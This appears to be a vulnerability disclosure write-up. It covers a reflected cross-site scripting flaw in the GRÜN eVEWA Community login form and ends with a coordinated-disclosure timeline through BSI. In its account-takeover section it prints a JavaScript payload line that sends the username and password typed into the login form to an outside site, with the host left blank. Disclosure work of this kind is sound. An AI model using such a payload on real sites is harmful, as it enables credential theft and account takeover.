The GRÜN eVEWA Community versions 31 to 53 were susceptible to a reflected Cross-Site Scripting (rXSS) vulnerability in the login form. This vulnerability enables attackers to acquire escalated privileges by submitting a crafted request to the login panel. To address this issue, a security patch labeled “H1” has been applied across versions 31 to 53.

Initial Findings

During my investigation of a domain, I stumbled upon a GRÜN eVEWA site. During my examination of the endpoints, I identified vulnerable rXSS file parameters in the following locations:


Login Panel

Upon revisiting the login panel, I found a potential case of URL-based injection. This allowed the injection of JavaScript code via the URL, resulting in the reflection of the injected code within the HTML form section:


Account Takeover (ATO)

Exploiting the vulnerability, I executed an account takeover by utilizing the JavaScript event onsubmit. This allowed me to surreptitiously transfer the entered credentials to a malicious site whenever the login button was clicked. The impact of this maneuver is a severe compromise of user authentication data, potentially leading to unauthorized access and misuse of user accounts.

To encapsulate my Out-of-Band (OOB) payload, I utilized the atob function, resulting in the following code snippet:

new Image().src=""+document.forms[0].elements[1].value+"!P:"+document.forms[0].elements[2].value

Additionally, the payload is subjected to Base64 and URL encoding, culminating in the final, obfuscated version:



Date Event
2023.01.28 Vulnerability reported to Federal Office for Information Security (BSI) through their Coordinated Vulnerability Disclosure (CVD) process.
2023.01.30 Acknowledgement received from BSI.
2023.01.31 Acknowledgement received from GRÜN.
2023.02.02 Information disseminated to GRÜN customers, and patch rollout initiated.
2023.03.08 Patch H1 successfully deployed to all customers; no customers were compromised by the reported vulnerability.